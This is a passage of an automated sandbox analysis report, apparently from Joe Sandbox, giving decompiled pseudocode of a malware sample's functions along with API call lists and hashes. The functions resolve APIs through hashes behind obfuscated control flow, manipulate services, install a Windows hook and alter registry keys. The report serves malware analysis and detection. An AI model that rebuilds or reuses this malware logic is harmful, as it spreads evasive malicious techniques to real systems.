						_t64 = _t11 - 0x22afb69c;
						if(_t64 > 0) {
							break;
						}
						if(_t64 == 0) {
							_t21 =  *0x225a4c4; // 0x605958
							_t60 = 0x1c;
							 *((intOrPtr*)(_t21 + 0x250)) = 0x2255793;
							L14:
							_t11 = 0x9076f63;
							continue;
						}
						if(_t11 == 0x502f5b) {
							E02252F84(0x4836b0ed, 0x7fd8698, 0x1c5);
							_t23 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t34 = _t23;
							if(_t34 == 0) {
								_t11 = 0x22afb69c;
							} else {
								_t24 =  *0x225a4c4; // 0x605958
								 *((intOrPtr*)(_t24 + 0x264)) = 1;
								_t11 = 0x4ef3871;
							}
							continue;
						}
						if(_t11 == 0xa04584) {
							_push(0x104);
							_push( &_v524);
							_push(0);
							 *((intOrPtr*)(E02252F84(0xf568ce83, 0x738e43f2, 0x169)))();
							_t28 = E02252C80( &_v536);
							_t43 =  *0x225a4c4; // 0x605958
							 *((intOrPtr*)(_t43 + 0x268)) = _t28;
							_t11 = 0x34cf5423;
							continue;
						}
						if(_t11 == 0x4ef3871) {
							_t60 = 0x29;
							_t11 = 0x2edd9354;
							continue;
						}
						if(_t11 != 0x9076f63) {
							goto L26;
						}
						_t29 =  *0x225a4c4; // 0x605958
						_push(_t29 + 0x26c);
						_push(0);
						_push(0);
						_push(_t60);
						_push(0);
						 *((intOrPtr*)(E02252F84(0xb7924d94, 0x1a51d89f, 0x269)))(); // executed
						_t33 = 1;
						_t61 =  ==  ? _t33 : _t61;
						_t11 = 0x33b48501;
					}
					if(_t11 == 0x2b1f137a) {
						_t12 = E02253037(0x478);
						 *0x225a4c4 = _t12;
						if(_t12 == 0) {
							_t11 = 0x3b5a6d9f;
							goto L26;
						}
						 *((intOrPtr*)(_t12 + 0x24c)) = E02255798;
						_t11 = 0x502f5b;
						goto L1;
					}
					if(_t11 == 0x2edd9354) {
						_push(_t34);
						 *((intOrPtr*)(E02252F84(0x4836b0ed, 0x28c81fb9, 0x11c)))();
						goto L14;
					}
					if(_t11 == 0x33b48501) {
						E02255667();
						_t11 = 0xa04584;
						goto L1;
					}
					if(_t11 != 0x34cf5423) {
						goto L26;
					}
					_push( &_v524);
					_push(0);
					_push(0);
					_push(0x25);
					_push(0);
					 *((intOrPtr*)(E02252F84(0xb7924d94, 0x1a51d89f, 0x269)))();
					_t48 =  *0x225a4c4; // 0x605958
					E02252473(_t48 + 0x228);
					L20:
					return _t61;
					L26:
				} while (_t11 != 0x3b5a6d9f);
				goto L20;
			}

0x022567f4
0x022567f8
0x02256806
0x02256806
0x02256808
0x02256808
0x02256808
0x02256808
0x0225680d
0x00000000
0x00000000
0x02256813
0x02256903
0x0225690a
0x0225690b
0x02256915
0x02256915
0x00000000
0x02256915
0x0225681e
0x022568d3
0x022568d9
0x022568db
0x022568df
0x022568f9
0x022568e1
0x022568e1
0x022568e9
0x022568ef
0x022568ef
0x00000000
0x022568df
0x02256829
0x0225687c
0x0225688a
0x0225688b
0x0225689c
0x022568a2
0x022568a7
0x022568ad
0x022568b3
0x00000000
0x022568b3
0x02256830
0x02256874
0x02256875
0x00000000
0x02256875
0x02256837
0x00000000
0x00000000
0x0225683d
0x02256851
0x02256852
0x02256853
0x02256854
0x02256855
0x02256861
0x02256867
0x02256868
0x0225686b
0x0225686b
0x02256924
0x022569b9
0x022569be
0x022569c5
0x022569db
0x00000000
0x022569db
0x022569c7
0x022569d1
0x00000000
0x022569d1
0x0225692f
0x02256997
0x022569ad
0x00000000
0x022569ad
0x02256936
0x02256988
0x0225698d
0x00000000
0x0225698d
0x0225693d
0x00000000
0x00000000
0x0225694c
0x0225694d
0x0225694e
0x0225694f
0x02256951
0x02256962
0x02256964
0x02256975
0x0225697c
0x02256987
0x022569e0
0x022569e0
0x00000000

APIs

OpenSCManagerW.SECHOST(00000000,00000000,000F003F,?,2895FB0B,?,?), ref: 022568D9

Strings

[/P, xrefs: 022569D1
XY`, xrefs: 0225683D, 022568A7, 022568E1, 02256903, 02256964, 022569BE
[/P, xrefs: 02256819

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID: ManagerOpen
String ID: XY`$[/P$[/P
API String ID: 1889721586-340891843
Opcode ID: 65d5f30dfcab75d950e63bd1c1ee661f6e76726f47f1980b045e501b162aa5c0
Instruction ID: c0e0b5dd15cc14a3e5f09f5b380cb958b703c25ab9464fefd9547397ef43e717
Opcode Fuzzy Hash: 65d5f30dfcab75d950e63bd1c1ee661f6e76726f47f1980b045e501b162aa5c0
Instruction Fuzzy Hash: 1F41C0703683265BD23C55D8EC9CA39369DC740364FD4CA2BFD05DB2C8CE7AD8458A21

Uniqueness

Uniqueness Score: -1.00%

Function 00403A3A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A3A(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				long _t29;
				char* _t30;
				intOrPtr _t32;
				char** _t34;
				signed int _t39;
				char** _t43;
				char* _t45;

				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
				_t45 =  *0x44251c; // 0x435040
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t34 = 0x44251c;
				if(_t45 == 0) {
					L14:
					return 1;
				}
				do {
					_t29 = RegOpenKeyExA(0x80000001,  *_t34, 0, 1,  &_v8); // executed
					if(_t29 != 0) {
						goto L12;
					}
					_t43 = _t34[1];
					while(1) {
						_t30 =  *_t43;
						if(_t30 == 0) {
							break;
						}
						if(RegQueryValueExA(_v8, _t30, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t39 = _t43[1];
							_t32 = _v20;
							if(_v12 == 0) {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) &  !_t39;
							} else {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) | _t39;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t43 =  &(_t43[2]);
					}
					RegCloseKey(_v8);
					_v8 = 0;
					L12:
					_t34 =  &(_t34[2]);
				} while ( *_t34 != 0);
				goto L14;
			}

0x00403a44
0x00403a4a
0x00403a50
0x00403a53
0x00403a56
0x00403a59
0x00403a60
0x00403a63
0x00403a68
0x00403af6
0x00403afc
0x00403afc
0x00403a6f
0x00403a7d
0x00403a85
0x00000000
0x00000000
0x00403a87
0x00403ad8
0x00403ad8
0x00403adc
0x00000000
0x00000000
0x00403aa5
0x00403ab0
0x00403ab3
0x00403ab6
0x00403ac2
0x00403ab8
0x00403ab8
0x00403ab8
0x00403ab6
0x00403ac8
0x00403acb
0x00403ad2
0x00403ad5
0x00403ad5
0x00403ae1
0x00403ae7
0x00403aea
0x00403aea
0x00403aed
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000001,@PC,00000000,00000001,?), ref: 00403A7D
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00403A9D
RegCloseKey.ADVAPI32(?), ref: 00403AE1

Strings

@PC, xrefs: 00403A4A, 00403A63, 00403A76

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: @PC
API String ID: 3677997916-3669301676
Opcode ID: 7e3950ef7bce093945acdd9d3cc986913b746b0efde1205527eef0e1a10a9443
Instruction ID: ba0bfb9c3578450b4f1f1542634a8380ad0c35d974bf2591f2b7a0502db76563
Opcode Fuzzy Hash: 7e3950ef7bce093945acdd9d3cc986913b746b0efde1205527eef0e1a10a9443
Instruction Fuzzy Hash: CF2107B1E10208EFDB15CF85D944AAEBBB8FF91706F1440AAE591B6290D3795B00CF25

Uniqueness

Uniqueness Score: -1.00%

Function 0225390F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164
serviceCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0225390F(void* __ecx, intOrPtr __edx) {
				char _v4;
				char _v8;
				short** _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v36;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _t18;
				void* _t20;
				signed int _t32;
				short** _t39;
				void* _t42;
				intOrPtr _t60;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t73;
				void* _t76;

				_t42 = __ecx;
				_t39 = _v12;
				_t68 = 0;
				_v24 = __edx;
				_v28 = __ecx;
				_t69 = 0x11ae28fa;
				_t73 = 0;
				while(1) {
					L1:
					_t18 = _v20;
					while(1) {
						_t76 = _t69 - 0x190cb621;
						if(_t76 > 0) {
							goto L18;
						}
						L3:
						if(_t76 == 0) {
							_t39 =  &(_t39[0xb]);
							asm("sbb esi, esi");
							_t69 = (_t69 & 0x19191b5f) + 0x153c083a;
							continue;
						} else {
							if(_t69 == 0x33f245d) {
								_push(0);
								_push(0);
								_push( &_v12);
								_push( &_v8);
								_push(0x20000);
								_push(_t68);
								_push(3);
								_push(0x30);
								_push(0);
								_push(_t42);
								if( *((intOrPtr*)(E02252F84(0x4836b0ed, 0xa10b62f, 0x106)))() == 0) {
									goto L14;
								} else {
									_t32 =  *((intOrPtr*)(E02252F84(0xf568ce83, 0xd6a8b600, 0x1a7)))();
									_t69 = 0x2e552399;
									_t18 = _v52 * 0x2c + _t68;
									_v60 = _t18;
									_t39 =  >=  ? _t68 : (_t32 & 0x0000001f) * 0x2c + _t68;
								}
								goto L11;
							} else {
								if(_t69 == 0x59713bc) {
									return E02252FDF(_t68);
								}
								if(_t69 == 0x79d7c1a) {
									_push(_t73);
									_push(1);
									_push(_t60);
									 *((intOrPtr*)(E02252F84(0x4836b0ed, 0x1893f270, 0x79)))();
									L14:
									_t69 = 0x153c083a;
									goto L10;
								} else {
									if(_t69 == 0x11ae28fa) {
										_t69 = 0x3ae9e7e3;
										continue;
									} else {
										if(_t69 != 0x153c083a) {
											L30:
											if(_t69 != 0x7f67b30) {
												goto L1;
											}
										} else {
											E02252FDF(_t73);
											_t69 = 0x59713bc;
											L10:
											_t18 = _v20;
											L11:
											_t42 = _v28;
											_t60 = _v24;
											while(1) {
												_t76 = _t69 - 0x190cb621;
												if(_t76 > 0) {
													goto L18;
												}
												goto L3;
											}
											goto L18;
										}
									}
								}
							}
						}
						L33:
						return _t18;
						L18:
						if(_t69 == 0x2dd58528) {
							_t18 = E02253037(0x2000);
							_t73 = _t18;
							if(_t73 == 0) {
								_t69 = 0x59713bc;
								goto L29;
							} else {
								_t69 = 0x33f245d;
								goto L10;
							}
						} else {
							if(_t69 == 0x2e552399) {
								E02252F84(0x4836b0ed, 0x58a5cab0, 0x1a0);
								_t20 = OpenServiceW(_t42,  *_t39, 1); // executed
								_v16 = _t20;
								_t69 =  !=  ? 0x3ab1752b : 0x190cb621;
								goto L10;
							} else {
								_t18 = 0x3ab1752b;
								if(_t69 == 0x3ab1752b) {
									_push( &_v4);
									_push(0x2000);
									_push(_t73);
									_push(1);
									_push(_v16);
									 *((intOrPtr*)(E02252F84(0x4836b0ed, 0x90d621c8, 0x1c2)))();
									_push(_v36);
									asm("sbb esi, esi");
									_t69 = (_t69 & 0xee90c5f9) + 0x190cb621;
									_t18 =  *((intOrPtr*)(E02252F84(0x4836b0ed, 0x28c81fb9, 0x11c)))();
									L29:
									_t60 = _v24;
									_t42 = _v28;
									goto L30;
								} else {
									if(_t69 != 0x3ae9e7e3) {
										goto L30;
									} else {
										_t18 = E02253037(0x20000);
										_t68 = 0x3ab1752b;
										if(0x3ab1752b != 0) {
											_t69 = 0x2dd58528;
											goto L10;
										}
									}
								}
							}
						}
						goto L33;
					}
				}
			}

0x0225390f
0x02253913
0x0225391a
0x0225391c
0x02253920
0x02253924
0x02253929
0x0225392b
0x0225392b
0x0225392b
0x0225392f
0x0225392f
0x02253935
0x00000000
0x00000000
0x0225393b
0x0225393b
0x02253a1f
0x02253a24
0x02253a2c
0x00000000
0x02253941
0x02253947
0x022539b7
0x022539b8
0x022539b9
0x022539be
0x022539bf
0x022539c4
0x022539c5
0x022539c7
0x022539c9
0x022539ca
0x022539e4
0x00000000
0x022539e6
0x022539fb
0x02253a00
0x02253a0f
0x02253a13
0x02253a17
0x02253a17
0x00000000
0x02253949
0x0225394f
0x00000000
0x02253b41
0x0225395b
0x02253992
0x02253993
0x02253995
0x022539a8
0x022539aa
0x022539aa
0x00000000
0x0225395d
0x02253963
0x0225398b
0x00000000
0x02253965
0x0225396b
0x02253b32
0x02253b38
0x00000000
0x02253b3a
0x02253971
0x02253973
0x02253978
0x0225397d
0x0225397d
0x02253981
0x02253981
0x02253985
0x0225392f
0x0225392f
0x02253935
0x00000000
0x00000000
0x00000000
0x02253935
0x00000000
0x0225392f
0x0225396b
0x02253963
0x0225395b
0x02253947
0x02253b4d
0x02253b4d
0x02253a37
0x02253a3d
0x02253b10
0x02253b15
0x02253b19
0x02253b25
0x00000000
0x02253b1b
0x02253b1b
0x00000000
0x02253b1b
0x02253a43
0x02253a49
0x02253aeb
0x02253af1
0x02253af5
0x02253b03
0x00000000
0x02253a4f
0x02253a4f
0x02253a56
0x02253a8b
0x02253a8c
0x02253a91
0x02253a92
0x02253a94
0x02253aa8
0x02253aaa
0x02253aba
0x02253ac7
0x02253ad3
0x02253b2a
0x02253b2a
0x02253b2e
0x00000000
0x02253a58
0x02253a5e
0x00000000
0x02253a64
0x02253a69
0x02253a6e
0x02253a72
0x02253a78
0x00000000
0x02253a78
0x02253a72
0x02253a5e
0x02253a56
0x02253a49
0x00000000
0x02253a3d
0x0225392f

APIs

OpenServiceW.ADVAPI32(2895FB0B,?,00000001,?,00000000,2895FB0B,2895FB0B,?,?,02255F93,?,2895FB0B,?,?), ref: 02253AF1

Part of subcall function 02253037: RtlAllocateHeap.NTDLL(00000000,00000008,684DEBFF), ref: 02253067

Strings

:, xrefs: 0225398B
:, xrefs: 02253A58

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID: AllocateHeapOpenService
String ID: :$:
API String ID: 4051131143-1146511642
Opcode ID: bc330caa01e0591f354b6ab3558df73477a8fa5cd181cc1f3507411807ba601a
Instruction ID: 9635fbb542af09540c069554e5c2ca98591cdf94733ad16486e92284ddba7ae8
Opcode Fuzzy Hash: bc330caa01e0591f354b6ab3558df73477a8fa5cd181cc1f3507411807ba601a
Instruction Fuzzy Hash: 56419C76A787325BD134E9E85880A7AA1D2EBC4390F09869EFC55B7288DF74CC40C6D2

Uniqueness

Uniqueness Score: -1.00%

Function 022558E8, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E022558E8() {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				void* _v572;
				void* _t21;
				void* _t31;
				void* _t32;
				intOrPtr _t39;
				struct _SECURITY_ATTRIBUTES* _t43;
				long _t45;
				intOrPtr _t54;
				void* _t58;
				void* _t63;
				void** _t67;

				_t67 =  &_v572;
				_t21 = 0x32a33eae;
				_t63 = _v572;
				_t43 = 0;
				while(1) {
					L1:
					while(1) {
						_t45 = 1;
						do {
							L3:
							while(_t21 != 0x371db1e) {
								if(_t21 == 0x12ca3564) {
									_push(_t63);
									 *((intOrPtr*)(E02252F84(0xf568ce83, 0x2e998fdc, 0x167)))();
								} else {
									if(_t21 == 0x28160846) {
										_t61 = 0xac6e2571;
										_push( &_v572);
										 *((intOrPtr*)(E02252F84(0xf568ce83, 0xac6e2571, 0x1fb)))();
										_t21 = 0x371db1e;
										_t45 = 1;
										continue;
									} else {
										if(_t21 == 0x32a33eae) {
											_t21 = 0x28160846;
											continue;
										} else {
											if(_t21 == 0x345cd1a5) {
												_t61 = 0xb82a8ec3;
												E02252F84(0xf568ce83, 0xb82a8ec3, 0x1a);
												_t31 = CreateFileW( &_v524, 0x100, _t45, 0, 3, 0, 0); // executed
												_t63 = _t31;
												if(_t63 != 0xffffffff) {
													_t21 = 0x3aee750b;
													while(1) {
														_t45 = 1;
														goto L3;
													}
												}
											} else {
												if(_t21 == 0x3690e992) {
													_t32 = E02252674(0x22598a0);
													_t54 =  *0x225a4c4; // 0x605958
													_t65 = _t32;
													_t61 = 0xb436274a;
													_t14 = _t54 + 8; // 0x605960
													_t15 = _t54 + 0x26c; // 0x605bc4
													_push(_t32);
													_push(0x104);
													_push( &_v524);
													 *((intOrPtr*)(E02252F84(0xa83808e5, 0xb436274a, 0x156)))();
													_t67 =  &(_t67[5]);
													E02252FDF(_t65);
													_t21 = 0x345cd1a5;
													goto L1;
												} else {
													if(_t21 != 0x3aee750b) {
														goto L17;
													} else {
														_t39 = _v568;
														_t61 = 0x45b3a231;
														_t58 = _v572;
														_push(0x28);
														_v560 = _t39;
														_v552 = _t39;
														_v544 = _t39;
														_v536 = _t39;
														_push( &_v564);
														_push(0);
														_v564 = _t58;
														_v556 = _t58;
														_v548 = _t58;
														_v540 = _t58;
														_push(_t63);
														_v532 = 0;
														 *((intOrPtr*)(E02252F84(0xf568ce83, 0x45b3a231, 0x289)))(); // executed
														_t21 = 0x12ca3564;
														_t45 = 1;
														_t43 =  !=  ? _t45 : _t43;
														continue;
													}
												}
											}
										}
									}
								}
								L20:
								return _t43;
							}
							_v572 = _v572 - E0225438D(_t45, _t61);
							_t21 = 0x3690e992;
							asm("sbb [esp+0x14], edx");
							_t45 = 1;
							L17:
						} while (_t21 != 0xf34c2b9);
						goto L20;
					}
				}
			}

0x022558e8
0x022558f3
0x022558f9
0x022558fd
0x022558ff
0x022558ff
0x02255904
0x02255906
0x02255907
0x00000000
0x02255907
0x02255917
0x02255a7f
0x02255a92
0x0225591d
0x02255922
0x02255a3e
0x02255a43
0x02255a51
0x02255a53
0x02255906
0x00000000
0x02255928
0x0225592d
0x02255a30
0x00000000
0x02255933
0x02255938
0x02255a0d
0x02255a17
0x02255a1d
0x02255a1f
0x02255a24
0x02255a26
0x02255904
0x02255906
0x00000000
0x02255906
0x02255904
0x0225593e
0x02255943
0x022559b0
0x022559b5
0x022559bb
0x022559bd
0x022559c2
0x022559c6
0x022559d2
0x022559d3
0x022559dc
0x022559e8
0x022559ea
0x022559ef
0x022559f4
0x00000000
0x02255945
0x0225594a
0x00000000
0x02255950
0x02255950
0x02255954
0x02255959
0x0225595d
0x0225595f
0x02255963
0x02255967
0x0225596b
0x02255973
0x02255974
0x02255975
0x02255979
0x0225597d
0x02255981
0x02255987
0x0225598d
0x02255997
0x0225599b
0x022559a2
0x022559a3
0x00000000
0x022559a3
0x0225594a
0x02255943
0x02255938
0x0225592d
0x02255922
0x02255a97
0x02255aa0
0x02255aa0
0x02255a62
0x02255a66
0x02255a6b
0x02255a71
0x02255a72
0x02255a72
0x00000000
0x02255a7d
0x02255904

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 02255997
CreateFileW.KERNELBASE(?,00000100,00000001,00000000,00000003,00000000,00000000), ref: 02255A1D

Strings

XY`, xrefs: 022559B5

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID: File$CreateHandleInformation
String ID: XY`
API String ID: 3667790775-3139772767
Opcode ID: 76c254fc68a97178e7ccfad838023829f7490a774c45af43fd42c219bb120b09
Instruction ID: 91b7ee44c74d586594d9864eb7ed928bcbbee4034d6d25a64fe458a571b03980
Opcode Fuzzy Hash: 76c254fc68a97178e7ccfad838023829f7490a774c45af43fd42c219bb120b09
Instruction Fuzzy Hash: EC418C306283219FC724DAE89894A3FB6D99B84724F94892FFD45C72C4DB78C945CB93

Uniqueness

Uniqueness Score: -1.00%

Function 0040B748, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040B748(void* __edi, void* __eflags) {
				intOrPtr _v0;
				void* __esi;
				struct HHOOK__* _t6;
				void* _t8;
				void* _t10;
				intOrPtr _t11;
				void* _t13;
				struct HHOOK__* _t14;

				_t10 = __edi;
				_push(0x4037fd);
				_t6 = E0040F584(_t8, 0x44642c, __edi, _t13, __eflags);
				_t14 = _t6;
				_t16 = _t14;
				if(_t14 == 0) {
					_t6 = E004037E3(_t8, 0x44642c, __edi, _t14, _t16);
				}
				_push(_t10);
				_t11 = _v0;
				if( *((intOrPtr*)(_t14 + 0x14)) != _t11) {
					if( *(_t14 + 0x28) == 0) {
						_t6 = SetWindowsHookExA(5, E0040B4F5, 0, GetCurrentThreadId()); // executed
						_t19 = _t6;
						 *(_t14 + 0x28) = _t6;
						if(_t6 == 0) {
							_t6 = E004037AF(_t8, 0x44642c, _t11, _t14, _t19);
						}
					}
					 *((intOrPtr*)(_t14 + 0x14)) = _t11;
				}
				return _t6;
			}

0x0040b748
0x0040b749
0x0040b753
0x0040b758
0x0040b75a
0x0040b75c
0x0040b75e
0x0040b75e
0x0040b763
0x0040b764
0x0040b76b
0x0040b771
0x0040b783
0x0040b789
0x0040b78b
0x0040b78e
0x0040b790
0x0040b790
0x0040b78e
0x0040b795
0x0040b795
0x0040b79a

APIs

Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B

GetCurrentThreadId.KERNEL32 ref: 0040B773
SetWindowsHookExA.USER32 ref: 0040B783

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

Strings

,dD, xrefs: 0040B74E

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: H_prolog3$CurrentException@8HookThreadThrowWindows
String ID: ,dD
API String ID: 1415497866-3191229884
Opcode ID: 8f866669248ae714854411d0b957cdf2ed001e559e2ffdcb1c22fb3dcb3eb344
Instruction ID: f4f6cd2454f4fa9c59ed38751070ba4084f81d528619c841e15a486b9898b3b2
Opcode Fuzzy Hash: 8f866669248ae714854411d0b957cdf2ed001e559e2ffdcb1c22fb3dcb3eb344
Instruction Fuzzy Hash: 06F0A7B55007115AD7306F16980571BB698DBE4762F11463FF501B72D0D738E94186AE

Uniqueness

Uniqueness Score: -1.00%

Function 004024B0, Relevance: 4.6, APIs: 3, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024B0(intOrPtr __ecx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				long _t24;
				long _t28;
				int* _t32;
				char* _t39;

				_v28 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_t39 =  *0x442000; // 0x4346d4
				_t24 = RegCreateKeyExA(0x80000002, _t39, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12); // executed
				_v16 = _t24;
				if(_v16 == 0) {
					_v24 = 4;
					 *_a4 = 1;
					_t28 = RegQueryValueExA(_v8, _a8, 0,  &_v20, _a4,  &_v24); // executed
					_v16 = _t28;
					if(_v16 != 0) {
						_t32 = E00402440(_v28,  *_a4, _a8); // executed
						_v16 = _t32;
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}

0x004024b6
0x004024b9
0x004024c0
0x004024dc
0x004024e8
0x004024ee
0x004024f5
0x004024f7
0x00402501
0x0040251d
0x00402523
0x0040252a
0x00402539
0x0040253e
0x0040253e
0x00402545
0x00402545
0x00402551

APIs

RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00401561,00000000,0043463C), ref: 004024E8
RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,?,00000000,00000004), ref: 0040251D
RegCloseKey.ADVAPI32(00000000), ref: 00402545

Part of subcall function 00402440: RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402471
Part of subcall function 00402440: RegSetValueExA.KERNELBASE(00000000,00000000,00000000,00000004,?,00000004), ref: 00402492
Part of subcall function 00402440: RegCloseKey.KERNELBASE(00000000), ref: 0040249F

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CloseCreateValue$Query
String ID:
API String ID: 4008097885-0
Opcode ID: 4b525abb1b769d0c291595b1a73f4448208f6ca78324013d7001a83c11f5276b
Instruction ID: 165df2290a195cec47e703b39910aa938aa55349580083daa8813ab03a4b17f9
Opcode Fuzzy Hash: 4b525abb1b769d0c291595b1a73f4448208f6ca78324013d7001a83c11f5276b
Instruction Fuzzy Hash: EF11DAB5A00208FFDB04DF94D959FEEB7B8EB48704F108159FA15AB290D774AA44CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402440, Relevance: 4.5, APIs: 3, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402440(intOrPtr __ecx, char _a4, char* _a8) {
				void* _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				long _t14;
				long _t17;
				char* _t23;

				_v20 = __ecx;
				_v8 = 0;
				_t23 =  *0x442000; // 0x4346d4
				_t14 = RegCreateKeyExA(0x80000002, _t23, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12); // executed
				_v16 = _t14;
				if(_v16 == 0) {
					_t17 = RegSetValueExA(_v8, _a8, 0, 4,  &_a4, 4); // executed
					_v16 = _t17;
					RegCloseKey(_v8); // executed
				}
				return _v16;
			}

0x00402446
0x00402449
0x00402465
0x00402471
0x00402477
0x0040247e
0x00402492
0x00402498
0x0040249f
0x0040249f
0x004024ab

APIs

RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402471
RegSetValueExA.KERNELBASE(00000000,00000000,00000000,00000004,?,00000004), ref: 00402492
RegCloseKey.KERNELBASE(00000000), ref: 0040249F

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: a536cca449fb09f120edcceb967e25cf4e89567f52e613179b64937aa943c92f
Instruction ID: 0737cfdb3224fe662ad643e141e09b39c7f81c064591b2ac6240f8f2dc458b35
Opcode Fuzzy Hash: a536cca449fb09f120edcceb967e25cf4e89567f52e613179b64937aa943c92f
Instruction Fuzzy Hash: 6301BFB9E40208FFE714DF94DD49FAEB778EB48700F108159BB15A7280D6B46A04DBA4

Uniqueness

Uniqueness Score: -1.00%

